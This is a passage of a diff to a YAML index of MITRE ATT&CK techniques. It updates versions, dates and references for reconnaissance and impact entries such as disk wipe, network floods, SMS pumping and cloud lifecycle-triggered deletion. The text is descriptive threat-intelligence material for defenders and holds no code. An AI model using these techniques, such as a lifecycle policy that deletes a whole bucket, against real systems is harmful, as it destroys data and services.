       x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
@@ -56774,7 +57450,7 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.1'
+      x_mitre_version: '1.2'
       type: attack-pattern
       id: attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161
       created: '2020-10-02T14:55:43.815Z'
@@ -56784,6 +57460,10 @@ reconnaissance:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1589/001
         external_id: T1589.001
+      - source_name: Bleeping Computer 2easy 2021
+        description: Bill Toulas. (2021, December 21). 2easy now a significant dark
+          web marketplace for stolen data. Retrieved October 7, 2024.
+        url: https://www.bleepingcomputer.com/news/security/2easy-now-a-significant-dark-web-marketplace-for-stolen-data/
       - source_name: ATT ScanBox
         description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
           Used with Watering Hole Attacks. Retrieved October 19, 2020.'
@@ -56796,6 +57476,10 @@ reconnaissance:
         description: Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October
           19, 2020.
         url: https://github.com/dxa4481/truffleHog
+      - source_name: Bleeping Computer Stealer Logs 2023
+        description: 'Flare. (2023, June 6). Dissecting the Dark Web Supply Chain:
+          Stealer Logs in Context. Retrieved October 10, 2024.'
+        url: https://www.bleepingcomputer.com/news/security/dissecting-the-dark-web-supply-chain-stealer-logs-in-context/
       - source_name: Register Uber
         description: McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub
           into court to find who hacked database of 50,000 drivers. Retrieved October
@@ -56818,6 +57502,10 @@ reconnaissance:
           Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved
           October 19, 2020.
         url: https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196
+      - source_name: SecureWorks Infostealers 2023
+        description: SecureWorks Counter Threat Unit Research Team. (2023, May 16).
+          The Growing Threat from Infostealers. Retrieved October 10, 2024.
+        url: https://www.secureworks.com/research/the-growing-threat-from-infostealers
       - source_name: Register Deloitte
         description: 'Thomson, I. (2017, September 26). Deloitte is a sitting duck:
           Key systems with RDP open, VPN and proxy ''login details leaked''. Retrieved
@@ -56825,9 +57513,8 @@ reconnaissance:
         url: https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.003:
     technique:
@@ -56886,7 +57573,7 @@ reconnaissance:
         adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530)
         to access valuable information that can be exfiltrated or used to escalate
         privileges and move laterally. "
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-15T19:10:23.838Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Wordlist Scanning
       x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
@@ -56906,7 +57593,6 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1591.004:
     technique:
@@ -56928,7 +57614,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:39:08.904Z'
       name: Identify Roles
       description: |-
         Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.
@@ -56944,12 +57630,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598:
     technique:
-      modified: '2023-09-08T20:28:49.600Z'
+      modified: '2024-05-31T04:18:44.570Z'
       name: Phishing for Information
       description: "Adversaries may send phishing messages to elicit sensitive information
         that can be used during targeting. Phishing for information is an attempt
@@ -57018,7 +57702,7 @@ reconnaissance:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: Avertium callback phishing
         description: Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK
           PHISHING. Retrieved February 2, 2023.
@@ -57066,31 +57750,12 @@ reconnaissance:
         url: https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.001:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
-      type: attack-pattern
-      created: '2020-10-02T16:54:23.193Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1595.001
-        url: https://attack.mitre.org/techniques/T1595/001
-      - source_name: Botnet Scan
-        url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
-        description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
-          a Botnet. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T13:46:55.039Z'
       name: Scanning IP Blocks
       description: |-
         Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.
@@ -57099,19 +57764,41 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Diego Sappa, Securonix
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).
 
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
+      created: '2020-10-02T16:54:23.193Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1595/001
+        external_id: T1595.001
+      - source_name: Botnet Scan
+        description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
+          a Botnet. Retrieved October 20, 2020.
+        url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1590.001:
     technique:
@@ -57169,7 +57856,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596.005:
     technique:
@@ -57190,7 +57876,7 @@ reconnaissance:
       - source_name: Shodan
         url: https://shodan.io
         description: Shodan. (n.d.). Shodan. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:49:49.260Z'
       name: Scan Databases
       description: |-
         Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)
@@ -57206,8 +57892,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.001:
     technique:
@@ -57233,7 +57917,7 @@ reconnaissance:
         url: https://www.sec.gov/edgar/search-and-access
         description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
           27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-27T15:37:09.025Z'
       name: Determine Physical Locations
       description: |-
         Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.
@@ -57249,8 +57933,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.1'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598.001:
     technique:
@@ -57274,7 +57956,7 @@ reconnaissance:
         url: https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/
         description: 'O''Donnell, L. (2020, October 20). Facebook: A Top Launching
           Pad For Phishing Attacks. Retrieved October 20, 2020.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:43:12.843Z'
       name: Spearphishing Service
       description: |-
         Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -57296,13 +57978,11 @@ reconnaissance:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
 impact:
   T1561.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:32:05.064Z'
       name: Disk Structure Wipe
       description: "Adversaries may corrupt or wipe the disk data structures on a
         hard drive necessary to boot a system; targeting specific critical systems
@@ -57394,13 +58074,12 @@ impact:
         url: https://www.symantec.com/connect/blogs/shamoon-attacks
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1498.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:54:49.943Z'
       name: Direct Network Flood
       description: |-
         Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.
@@ -57409,7 +58088,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_deprecated: false
       x_mitre_detection: 'Detection of a network flood can sometimes be achieved before
         the traffic volume is sufficient to cause impact to the availability of the
@@ -57426,17 +58104,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Sensor Health: Host Status'
@@ -57461,7 +58134,8 @@ impact:
         url: https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1491.002:
     technique:
@@ -57499,7 +58173,7 @@ impact:
         description: 'Marco Balduzzi, Ryan Flores, Lion Gu, Federico Maggi, Vincenzo
           Ciancaglini, Roel Reyes, Akira Urano. (n.d.). A Deep Dive into Defacement:
           How Geopolitical Events Trigger Web Attacks. Retrieved April 19, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-25T19:34:37.539Z'
       name: External Defacement
       description: 'An adversary may deface systems external to an organization in
         an attempt to deliver messaging, intimidate, or otherwise mislead an organization
@@ -57533,12 +58207,10 @@ impact:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_impact_type:
       - Integrity
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1499.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:51.289Z'
       name: OS Exhaustion Flood
       description: |-
         Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.
@@ -57603,42 +58275,127 @@ impact:
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
-  T1499.003:
+  T1485.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
+      modified: '2024-10-16T21:27:02.481Z'
+      name: Lifecycle-Triggered Deletion
+      description: "Adversaries may modify the lifecycle policies of a cloud storage
+        bucket to destroy all objects stored within.  \n\nCloud storage buckets often
+        allow users to set lifecycle policies to automate the migration, archival,
+        or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation:
+        GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor
+        has sufficient permissions to modify these policies, they may be able to delete
+        all objects at once. \n\nFor example, in AWS environments, an adversary with
+        the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle`
+        API call to apply a lifecycle policy to an S3 bucket that deletes all objects
+        in the bucket after one day.(Citation: Palo Alto Cloud Ransomware) In addition
+        to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657),
+        adversaries may also perform this action on buckets storing cloud logs for
+        [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation:
+        Datadog S3 Lifecycle CloudTrail Logs)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Storage: Cloud Storage Modification'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--1001e0d6-ee09-4dfc-aa90-e9320ffc8fe4
+      created: '2024-09-25T13:16:14.166Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1485/001
+        external_id: T1485.001
+      - source_name: AWS Storage Lifecycles
+        description: AWS. (n.d.). Managing the lifecycle of objects. Retrieved September
+          25, 2024.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lifecycle-mgmt.html
+      - source_name: GCP Storage Lifecycles
+        description: Google Cloud. (n.d.). Object Lifecycle Management. Retrieved
+          September 25, 2024.
+        url: https://cloud.google.com/storage/docs/lifecycle
+      - source_name: Azure Storage Lifecycles
+        description: Microsoft Azure. (2024, July 3). Configure a lifecycle management
+          policy. Retrieved September 25, 2024.
+        url: https://learn.microsoft.com/en-us/azure/storage/blobs/lifecycle-management-policy-configure?tabs=azure-portal
+      - source_name: Palo Alto Cloud Ransomware
+        description: 'Ofir Balassiano and Ofir Shaty. (2023, November 29). Ransomware
+          in the Cloud: Breaking Down the Attack Vectors. Retrieved September 25,
+          2024.'
+        url: https://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/
+      - source_name: Datadog S3 Lifecycle CloudTrail Logs
+        description: Stratus Red Team. (n.d.). CloudTrail Logs Impairment Through
+          S3 Lifecycle Rule. Retrieved September 25, 2024.
+        url: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1496.003:
+    technique:
+      modified: '2024-10-16T17:45:14.210Z'
+      name: SMS Pumping
+      description: |-
+        Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.(Citation: Twilio SMS Pumping) SMS pumping is a type of telecommunications fraud whereby a threat actor first obtains a set of phone numbers from a telecommunications provider, then leverages a victim’s messaging infrastructure to send large amounts of SMS messages to numbers in that set. By generating SMS traffic to their phone number set, a threat actor may earn payments from the telecommunications provider.(Citation: Twilio SMS Pumping Fraud)
+
+        Threat actors often use publicly available web forms, such as one-time password (OTP) or account verification fields, in order to generate SMS traffic. These fields may leverage services such as Twilio, AWS SNS, and Amazon Cognito in the background.(Citation: Twilio SMS Pumping)(Citation: AWS RE:Inforce Threat Detection 2024) In response to the large quantity of requests, SMS costs may increase and communication channels may become overwhelmed.(Citation: Twilio SMS Pumping)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Application Log: Application Log Content'
+      x_mitre_impact_type:
+      - Availability
       type: attack-pattern
-      created: '2020-02-20T15:35:00.025Z'
+      id: attack-pattern--130d4494-b2d6-4040-bcea-6e59f05222fe
+      created: '2024-09-25T13:53:19.586Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1499.003
-        url: https://attack.mitre.org/techniques/T1499/003
-      - source_name: Arbor AnnualDoSreport Jan 2018
-        url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
-        description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
-          Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
-          into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
-          Infrastructure Security Report. Retrieved April 22, 2019.
-      - source_name: Cisco DoSdetectNetflow
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1496/003
+        external_id: T1496.003
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+      - source_name: Twilio SMS Pumping
+        description: Twilio. (2024, April 10). What Is SMS Pumping Fraud and How to
+          Stop It. Retrieved September 25, 2024.
+        url: https://www.twilio.com/en-us/blog/sms-pumping-fraud-solutions
+      - source_name: Twilio SMS Pumping Fraud
+        description: Twilio. (n.d.). What is SMS Pumping Fraud?. Retrieved September
+          25, 2024.
+        url: https://www.twilio.com/docs/glossary/what-is-sms-pumping-fraud
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1499.003:
+    technique:
+      modified: '2024-10-15T15:41:49.168Z'
       name: Application Exhaustion Flood
       description: 'Adversaries may target resource intensive features of applications
         to cause a denial of service (DoS), denying availability to those applications.
@@ -57649,13 +58406,20 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
 
         In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -57663,12 +58427,33 @@ impact:
       - 'Application Log: Application Log Content'
       x_mitre_impact_type:
       - Availability
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+      created: '2020-02-20T15:35:00.025Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1499/003
+        external_id: T1499.003
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+      - source_name: Arbor AnnualDoSreport Jan 2018
+        description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
+          Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
+          into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
+          Infrastructure Security Report. Retrieved April 22, 2019.
+        url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1561:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-20T18:16:41.942Z'
       name: Disk Wipe
       description: |-
         Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.
@@ -57729,109 +58514,79 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1565.001:
     technique:
+      modified: '2024-08-26T16:33:33.982Z'
+      name: Stored Data Manipulation
+      description: |-
+        Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
+
+        Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: Where applicable, inspect important file hashes, locations,
+        and modifications for suspicious/unexpected values.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'File: File Modification'
+      - 'File: File Creation'
+      - 'File: File Deletion'
+      x_mitre_impact_type:
+      - Integrity
       type: attack-pattern
       id: attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292
       created: '2020-03-02T14:22:24.410Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1565.001
         url: https://attack.mitre.org/techniques/T1565/001
+        external_id: T1565.001
       - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
         description: Department of Justice. (2018, September 6). Criminal Complaint
           - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
       - source_name: FireEye APT38 Oct 2018
-        url: https://content.fireeye.com/apt/rpt-apt38
         description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
           November 6, 2018.'
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
-
-        Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Stored Data Manipulation
-      x_mitre_detection: Where applicable, inspect important file hashes, locations,
-        and modifications for suspicious/unexpected values.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'File: File Modification'
-      - 'File: File Creation'
-      - 'File: File Deletion'
-      x_mitre_impact_type:
-      - Integrity
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
